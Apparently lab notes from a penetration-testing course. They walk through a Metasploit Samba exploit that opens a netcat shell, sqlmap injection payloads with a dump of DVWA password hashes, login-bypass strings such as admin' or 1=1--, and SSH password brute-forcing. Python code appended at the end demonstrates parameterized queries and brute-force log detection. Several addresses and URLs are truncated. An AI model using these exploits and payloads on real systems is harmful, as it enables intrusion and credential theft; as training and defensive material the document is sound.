Penetration Testing Training

March 13, Day 1: summary of the main exercises

First, exploiting the Struts2 vulnerability: it allows arbitrary commands to be executed directly and gives control of the host.

Lab environment: Kali Linux as the attack machine; OWASP, 2003 and Metasploitable as target machines, all confirmed reachable.

Using Metasploit to attack the target's Samba service and obtain a shell:

search samba                        (find the module)
use multi/samba/usermap_script      (choose the exploit module)
show payloads                       (list the payloads compatible with this exploit module)
set payload cmd/unix/bind_netcat    (use netcat to run a shell once the exploit succeeds)
show options                        (show the parameters that need to be set)
set rhost 54                        (set the target host)
exploit                             (launch the attack)

1. First install the VM software, start Kali, OWASP, Metasploitable and the other tools, and set up the environment so that the network is reachable. Use NAT mode for the network, with the address range /24.

2. Start the Kali VM, switch to root, and enter msfconsole. Change the initial password to 123456:

msf > passwd
[*] exec: passwd
输入新的 unix 密码:
重新输入新的 unix 密码:
passwd: 已成功更新密码

Then search for the Samba modules:

msf > search samba

matching modules
================

name                                              disclosure date  rank       description
auxiliary/admin/smb/samba_symlink_traversal                        normal     samba symlink directory traversal
auxiliary/dos/samba/lsa_addprivs_heap                              normal     samba lsa_io_privilege_set heap overflow
auxiliary/dos/samba/lsa_transnames_heap                            normal     samba lsa_io_trans_names heap overflow
auxiliary/dos/samba/read_nttrans_ea_list                           normal     samba read_nttrans_ea_list integer overflow
exploit/freebsd/samba/trans2open                  2003-04-07       great      samba trans2open overflow (*bsd x86)
exploit/linux/samba/chain_reply                   2021-06-16       good       samba chain_reply memory corruption (linux x86)
exploit/linux/samba/lsa_transnames_heap           2007-05-14       good       samba lsa_io_trans_names heap overflow
exploit/linux/samba/setinfopolicy_heap            2021-04-10       normal     samba setinformationpolicy auditeventsinfo heap overflow
exploit/linux/samba/trans2open                    2003-04-07       great      samba trans2open overflow (linux x86)
exploit/multi/samba/nttrans                       2003-04-07       average    samba 2.2.2 - 2.2.6 nttrans buffer overflow
exploit/multi/samba/usermap_script                2007-05-14       excellent  samba "username map script" command execution
exploit/osx/samba/lsa_transnames_heap             2007-05-14       average    samba lsa_io_trans_names heap overflow
exploit/osx/samba/trans2open                      2003-04-07       great      samba trans2open overflow (mac os x ppc)
exploit/solaris/samba/lsa_transnames_heap         2007-05-14       average    samba lsa_io_trans_names heap overflow
exploit/solaris/samba/trans2open                  2003-04-07       great      samba trans2open overflow (solaris sparc)
exploit/unix/misc/distcc_exec                     2002-02-01       excellent  distcc daemon command execution
exploit/unix/webapp/citrix_access_gateway_exec    2021-12-21       excellent  citrix access gateway command execution
exploit/windows/http/sambar6_search_results       2003-06-21       normal     sambar 6 search results buffer overflow
exploit/windows/license/calicclnt_getconfig       2005-03-02       average    computer associates license client getconfig overflow
post/linux/gather/enum_configs                                     normal     linux gather configurations

msf > use multi/samba/usermap_script          (choose the exploit module)
msf exploit(usermap_script) > show payloads   (list the payloads compatible with this module)

compatible payloads
===================

name                                  rank    description
cmd/unix/bind_awk                     normal  unix command shell, bind tcp via awk
cmd/unix/bind_inetd                   normal  unix command shell, bind tcp (inetd)
cmd/unix/bind_lua                     normal  unix command shell, bind tcp via lua
cmd/unix/bind_netcat                  normal  unix command shell, bind tcp via netcat
cmd/unix/bind_netcat_gaping           normal  unix command shell, bind tcp via netcat -e
cmd/unix/bind_netcat_gaping_ipv6      normal  unix command shell, bind tcp via netcat -e (ipv6)
cmd/unix/bind_perl                    normal  unix command shell, bind tcp via perl
cmd/unix/bind_perl_ipv6               normal  unix command shell, bind tcp via perl (ipv6)
cmd/unix/bind_ruby                    normal  unix command shell, bind tcp via ruby
cmd/unix/bind_ruby_ipv6               normal  unix command shell, bind tcp via ruby (ipv6)
cmd/unix/bind_zsh                     normal  unix command shell, bind tcp via zsh
cmd/unix/generic                      normal  unix command, generic command execution
cmd/unix/reverse                      normal  unix command shell, double reverse tcp (telnet)
cmd/unix/reverse_awk                  normal  unix command shell, reverse tcp via awk
cmd/unix/reverse_lua                  normal  unix command shell, reverse tcp via lua
cmd/unix/reverse_netcat               normal  unix command shell, reverse tcp via netcat
cmd/unix/reverse_netcat_gaping        normal  unix command shell, reverse tcp via netcat -e
cmd/unix/reverse_openssl              normal  unix command shell, double reverse tcp ssl (openssl)
cmd/unix/reverse_perl                 normal  unix command shell, reverse tcp via perl
cmd/unix/reverse_perl_ssl             normal  unix command shell, reverse tcp ssl via perl
cmd/unix/reverse_php_ssl              normal  unix command shell, reverse tcp ssl via php
cmd/unix/reverse_python               normal  unix command shell, reverse tcp via python
cmd/unix/reverse_python_ssl           normal  unix command shell, reverse tcp ssl via python
cmd/unix/reverse_ruby                 normal  unix command shell, reverse tcp via ruby
cmd/unix/reverse_ruby_ssl             normal  unix command shell, reverse tcp ssl via ruby
cmd/unix/reverse_ssl_double_telnet    normal  unix command shell, double reverse tcp ssl (telnet)
cmd/unix/reverse_zsh                  normal  unix command shell, reverse tcp via zsh

msf exploit(usermap_script) > set payload cmd/unix/bind_netcat   (use netcat to run a shell once the exploit succeeds)
payload => cmd/unix/bind_netcat
msf exploit(usermap_script) > show options    (show the parameters that need to be set)
msf exploit(usermap_script) > set rhost 54    (set the target host)
rhost => 54
msf exploit(usermap_script) > exploit         (launch the attack)
[*] started bind handler
[*] command shell session 1 opened (28:56558 -> 10.10.10.254:4444) at 2021-03-13 16:06:40 +0800

Control of host 54 has been obtained, so a user can be added:

useradd test

The user is added successfully.

Host discovery

-PU -sn: UDP ping, does not list services; -Pn: do not ping.
nmap -sS -Pn xx.xx.xx.xx                          TCP SYN scan, no ICMP is sent
nmap -sV -Pn xx.xx.xx.xx                          list detailed service information
nmap -P0 --script=smb-check-vulns xx.xx.xx.xx     look for the MS08-067 vulnerability

Web site scan with nmap, run from msfconsole:

msf > nmap
msf > nmap -sV -Pn 54
[*] exec: nmap -sV -Pn 54

starting nmap 6.46 at 2021-03-13 16:38 cst
nmap scan report for 54
host is up (0.00020s latency).
all 1000 scanned ports on 54 are filtered
mac address: 00:50:56:e7:1b:31 (vmware)

service detection performed. please report any incorrect results at .
nmap done: 1 ip address (1 host up) scanned in 22.84 seconds

msf > nmap -P0 --script=smb-check-vulns 54
[*] exec: nmap -P0 --script=smb-check-vulns 54

starting nmap 6.46 at 2021-03-13 16:47 cst
nmap scan report for 54
host is up (0.00021s latency).
all 1000 scanned ports on 54 are filtered
mac address: 00:50:56:e7:1b:31 (vmware)

nmap done: 1 ip address (1 host up) scanned in 23.06 seconds

msf > nmap -O
[*] exec: nmap -O

starting nmap 6.46 at 2021-03-13 17:16 cst
nmap scan report for 32
host is up (0.0054s latency).
not shown: 999 filtered ports
port    state  service
80/tcp  open   http
warning: osscan results may be unreliable because we could not find at least 1 open and 1 closed port
aggressive os guesses: brother mfc-7820n printer (94%), digi connect me serial-to-ethernet bridge (94%), netgear sc101 storage central nas device (91%), shoretel shoregear-t1 voip switch (91%), aastra 480i ip phone or sun remote system control (rsc) (91%), aastra 6731i voip phone or apple airport express wap (91%), cisco wireless ip phone 7920-etsi (91%), gopro hero3 camera (91%), konica minolta bizhub 250 printer (91%), linux 2.4.26 (slackware 10.0.0) (86%)
no exact os matches for host (test conditions non-ideal).

os detection performed. please report any incorrect results at .
nmap done: 1 ip address (1 host up) scanned in 57.88 seconds

msf > use auxiliary/scanner/http/dir_scanner
msf auxiliary(dir_scanner) > set threads 50
threads => 50
msf auxiliary(dir_scanner) > set rhosts
rhosts =>
msf auxiliary(dir_scanner) > run
[*] detecting error code
[*] detecting error code
[*] scanned 2 of 2 hosts (100% complete)
[*] auxiliary module execution completed

Checking for SQL injection vulnerabilities with sqlmap

root@kali:~# sqlmap
root@kali:~# sqlmap -u --cookie="security=low; phpsessid=lu1d2nfdvfkgkc8fa628c0vh23"

Passing the session cookie this way lets sqlmap read the users and passwords out of this site's database.

sqlmap/1.0-dev - automatic sql injection and database takeover tool

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. it is the end user's responsibility to obey all applicable local, state and federal laws. developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:50:20

[11:50:20] [info] testing connection to the target url
[11:50:20] [info] testing if the target url is stable. this can take a couple of seconds
[11:50:21] [info] target url is stable
[11:50:21] [info] testing if get parameter id is dynamic
[11:50:21] [info] confirming that get parameter id is dynamic
[11:50:21] [info] get parameter id is dynamic
[11:50:21] [info] heuristics detected web page charset ascii
[11:50:21] [info] heuristic (basic) test shows that get parameter id might be injectable (possible dbms: mysql)
[11:50:21] [info] testing for sql injection on get parameter id
heuristic (parsing) test showed that the back-end dbms could be mysql. do you want to skip test payloads specific for other dbmses? [y/n] y
do you want to include all tests for mysql extending provided level (1) and risk (1)? [y/n] y
[11:50:25] [info] testing and boolean-based blind - where or having clause
[11:50:25] [warning] reflective value(s) found and filtering out
[11:50:25] [info] get parameter id seems to be and boolean-based blind - where or having clause injectable
[11:50:25] [info] testing mysql >= 5.0 and error-based - where or having clause
[11:50:25] [info] get parameter id is mysql >= 5.0 and error-based - where or having clause injectable
[11:50:25] [info] testing mysql inline queries
[11:50:25] [info] testing mysql > 5.0.11 stacked queries
[11:50:25] [warning] time-based comparison requires larger statistical model, please wait.
[11:50:25] [info] testing mysql > 5.0.11 and time-based blind
[11:50:36] [info] get parameter id seems to be mysql > 5.0.11 and time-based blind injectable
[11:50:36] [info] testing mysql union query (null) - 1 to 20 columns
[11:50:36] [info] automatically extending ranges for union query injection technique tests as there is at least one other potential technique found
[11:50:36] [info] order by technique seems to be usable. this should reduce the time needed to find the right number of query columns. automatically extending the range for current union query injection technique test
[11:50:36] [info] target url appears to have 2 columns in query
[11:50:36] [info] get parameter id is mysql union query (null) - 1 to 20 columns injectable
get parameter id is vulnerable. do you want to keep testing the others (if any)? [y/n] n
sqlmap identified the following injection points with a total of 41 http(s) requests:
---
place: get
parameter: id
type: boolean-based blind
title: and boolean-based blind - where or having clause
payload: id=1 and 4334=4334 and iasx=iasx&submit=submit

type: error-based
title: mysql >= 5.0 and error-based - where or having clause
payload: id=1 and select4941 fromselectcount*,concat0x71626e6f71,selectcase when 4941=4941then1else 0end,0x7163716271,floorrand0*2xfrom information_schema.character_sets group by xa and zahu=zahu&submit=submit

type: union query
title: mysql union query (null) - 2 columns
payload: id=1unionallselect null,concat0x71626e6f71,0x4b4977451,0x7163716271#&submit=submit

type: and/or time-based blind
title: mysql > 5.0.11 and time-based blind
payload: id=1 and sleep5 and xfnp=xfnp&submit=submit
---
[11:50:40] [info] the back-end dbms is mysql
web server operating system: linux ubuntu 10.04 (lucid lynx)
web application technology: php 5.3.2, apache 2.2.14
back-end dbms: mysql 5.0
[11:50:40] [info] fetched data logged to text files under /usr/share/sqlmap/output/29

[*] shutting down at 11:50:40

root@kali:~# sqlmap -u --cookie="security=low; phpsessid=lu1d2nfdvfkgkc8fa628c0vh23" -p id --dbs

The databases returned are:

[11:53:32] [warning] reflective value(s) found and filtering out
available databases [2]:
[*] dvwa
[*] information_schema

root@kali:~# sqlmap -u --cookie="security=low; phpsessid=lu1d2nfdvfkgkc8fa628c0vh23" -p id -D dvwa --tables   (list the tables of the dvwa database)

database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

root@kali:~# sqlmap -u --cookie="security=low; phpsessid=lu1d2nfdvfkgkc8fa628c0vh23" -p id -D dvwa -T users --columns

database: dvwa
table: users
[6 columns]
+------------+-------------+
| column     | type        |
+------------+-------------+
| user       | varchar(15) |
| avatar     | varchar(70) |
| first_name | varchar(15) |
| last_name  | varchar(15) |
| password   | varchar(32) |
| user_id    | int(6)      |
+------------+-------------+

root@kali:~# sqlmap -u --cookie="security=low; phpsessid=lu1d2nfdvfkgkc8fa628c0vh23" -p id -D dvwa -T users -C user,password --dump

database: dvwa
table: users
[5 entries]
+---------+--------------------------------------------+
| user    | password                                   |
+---------+--------------------------------------------+
| 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) |
| admin   | 21232f297a57a5a743894a0e4a801fc3 (admin)   |
| gordonb | e99a18c428cb38d5f260853678922e03 (abc123)  |
| pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7           |
| smithy  | 5f4dcc3b5aa765d61d8327deb882cf99           |
+---------+--------------------------------------------+

The user admin has the password admin. Success.

Day 2

Information gathering

whois: domain registration information lookup; target:
Netcraft: the information the site provides can be queried, such as the site's hosting provider, ranking and operating system.
Side-site technique: if the main site has no weaknesses, look at the other sites hosted on the same server; ip2domain does the reverse lookup from IP to domain.

1. Google hacking.

2. Directory structure: "parent directory" site:/xxxx. inc: site configuration information, database passwords and so on; bak: backup files; txt or sql: data structures and so on.

use auxiliary/scanner/http/dir_scanner
set threads 50      (set the number of threads)
set rhosts xxxx     (set the target)
Once configured, run (or exploit).

robots.txt tells search engines which directories hold sensitive files.

3. Searching for files of a specific type: site:xxxx.

4. Searching for pages likely to have SQL injection points: site:xxx inurl:login. On the login page, add a single quote after an arbitrary user name to trigger a database error, from which the format of the database query can be discovered:

select * from users where username='xx' and password='xx'
admin' or 1
admin' or 1
select * from users where username='admin'
admin' or 1=1--

With that, any digits can be entered as the password.

Adding a single quote on a page of the site: if injection is present a database error appears, otherwise the page does not change. Another way is to append and 1=1 or and 1=2; both produce errors. There is also a'='a and admin' or 1=1--. Then move on to sqlmap:

sqlmap -u
sqlmap -u http:/
root@kali:~# sqlmap
sqlmap -u url --cookie= -p id -D -T

Host discovery and port scanning

Live host scan:

use auxiliary/scanner/discovery/arp_sweep
set rhosts 2-130
set threads 50
run

2. nmap.

Service scanning and enumeration

1. Metasploit's scanner auxiliary modules include many tools for service scanning and enumeration, usually named after the service, e.g. [service name]_login. To find them: search name:_version

2. SSH enumeration:

use auxiliary/scanner/ssh/ssh_version
set rhosts xxxx
set threads 100
run

SSH enumeration exercise:

root@kali:~# msfconsole
msf > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(ssh_version) > show options

module options (auxiliary/scanner/ssh/ssh_version):

name     current setting  required  description
rhosts                    yes       the target address range or cidr identifier
rport    22               yes       the target port
threads  1                yes       the number of concurrent threads
timeout  30               yes       timeout for the ssh probe

msf auxiliary(ssh_version) > set rhosts 29
rhosts => 29
msf auxiliary(ssh_version) > set threads 100
threads => 100
msf auxiliary(ssh_version) > run
[*] 29:22, ssh server version: ssh-2.0-openssh_5.3p1 debian-3ubuntu4
[*] scanned 1 of 1 hosts (100% complete)
[*] auxiliary module execution completed

Password guessing

The address can be an address range, a single IP or an address block. In msfconsole:

use auxiliary/scanner/ssh/ssh_login
set rhosts 0
set username root
set pass_
set threads 100
run

Create the password file with vi.

Password sniffing: use auxiliary/sniffer/psnuffle

Password guessing exercise:

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > show options

module options (auxiliary/scanner/ssh/ssh_login):

name              current setting  required  description
blank_passwords   false            no        try blank passwords for all users
bruteforce_speed  5                yes       how fast to bruteforce, from 0 to 5
db_all_creds      false            no        try each user/password couple stored in the current database
db_all_pass       false            no        add all passwords in the current database to the list
db_all_users      false            no        add all users in the current database to the list
password                           no        a specific password to authenticate with
pass_file                          no        passwords, one per line
rhosts                             yes       the target address range or cidr identifier
rport             22               yes       the target port
stop_on_success   false            yes       stop guessing when a credential works for a host
threads           1                yes       the number of concurrent threads
username                           no        a specific username to authenticate as
userpass_file                      no        users and passwords separated by space, one pair per line
user_as_pass      false            no        try the username as the password for all users
user_file                          no        usernames, one per line
verbose           true             yes       whether to print output for all attempts

msf auxiliary(ssh_login) > set username root
username => root
msf auxiliary(ssh_login) > set pass_file /root/passwd    (a password file named passwd created in root's home directory)
pass_file => /root/passwd
msf auxiliary(ssh_login) > set threads 50
threads => 50
msf auxiliary(ssh_login) > set rhosts 29
rhosts => 29
msf auxiliary(ssh_login) > run
[*] 29:22 ssh - starting bruteforce
[*] 29:22 ssh - [1/3] - trying: username: 'root' with password: 'ahbieid' - 10.10.1
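The login-page test in the Day 2 notes (a stray quote that produces a database error, and admin' or 1=1-- that gets past the password check) comes down to how the application builds its query. The following Python/sqlite3 example is added here and is not part of the training notes or of DVWA: it uses a constructed in-memory users table shaped like the dumped one, shows the concatenated query that exhibits both symptoms, and the parameterized query that removes them.

```python
import hashlib
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the dumped DVWA users table (user, and
    password stored as MD5). The rows and passwords are made up for the example."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user TEXT, password TEXT)")
    for user, pw in [("admin", "example-pass-1"), ("gordonb", "example-pass-2")]:
        db.execute("INSERT INTO users VALUES (?, ?)",
                   (user, hashlib.md5(pw.encode()).hexdigest()))
    return db


def login_vulnerable(db, username, password):
    """Builds the statement by string formatting, the pattern the notes describe.
    Returns the matched user, None when no row matches, or "db-error" when the
    input broke the SQL syntax: the 'add a quote and watch for an error' symptom."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    sql = "SELECT user FROM users WHERE user='%s' AND password='%s'" % (username, pw_hash)
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.OperationalError:
        return "db-error"
    return row[0] if row else None


def login_safe(db, username, password):
    """Same check with bound parameters: the input is passed as data, so a quote
    or an "or 1=1--" tail is compared literally against the column, never parsed."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    row = db.execute("SELECT user FROM users WHERE user=? AND password=?",
                     (username, pw_hash)).fetchone()
    return row[0] if row else None
```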
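The ssh_login run above is what password guessing looks like from the attacker's console; on the target it shows up as a burst of "Failed password" lines in sshd's auth log. The following Python detector is an added example, not from the page: it parses constructed auth.log lines, flags a source that fails three times within five minutes, and escalates when an accepted login from that source follows the burst. The year, threshold and window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed OpenSSH auth.log sample (not from the page). Syslog lines carry no
# year, so parse() takes one as an argument; 2021 below is an assumption.
SAMPLE_LOG = """\
Mar 13 16:20:01 target sshd[2201]: Failed password for root from 10.10.10.28 port 40110 ssh2
Mar 13 16:20:02 target sshd[2203]: Failed password for root from 10.10.10.28 port 40112 ssh2
Mar 13 16:20:02 target sshd[2205]: Failed password for invalid user admin from 10.10.10.28 port 40114 ssh2
Mar 13 16:20:03 target sshd[2207]: Failed password for root from 10.10.10.28 port 40116 ssh2
Mar 13 16:20:04 target sshd[2209]: Accepted password for root from 10.10.10.28 port 40118 ssh2
Mar 13 16:45:10 target sshd[2300]: Failed password for alice from 10.10.10.7 port 50001 ssh2
Mar 13 16:46:30 target sshd[2302]: Accepted publickey for alice from 10.10.10.7 port 50003 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)

def parse(log_text, year=2021):
    """Return (timestamp, result, user, ip) tuples for the sshd auth lines."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["result"], m["user"], m["ip"]))
    return events

def detect(events, threshold=3, window=timedelta(minutes=5)):
    """Map source ip -> verdict. 'bruteforce' once `threshold` failures from one
    ip fall inside `window`; 'bruteforce+success' if an accepted login from that
    ip follows the burst, which is the case that needs an immediate response."""
    verdicts = {}
    recent_failures = defaultdict(list)
    for ts, result, _user, ip in events:
        if result == "Failed":
            # keep only the failures still inside the sliding window
            recent_failures[ip] = [t for t in recent_failures[ip] if ts - t <= window]
            recent_failures[ip].append(ts)
            if len(recent_failures[ip]) >= threshold:
                verdicts.setdefault(ip, "bruteforce")
        elif verdicts.get(ip) == "bruteforce":
            verdicts[ip] = "bruteforce+success"
    return verdicts
```

A single failure followed by a key-based login (alice above) is left alone, so the check does not fire on ordinary typos.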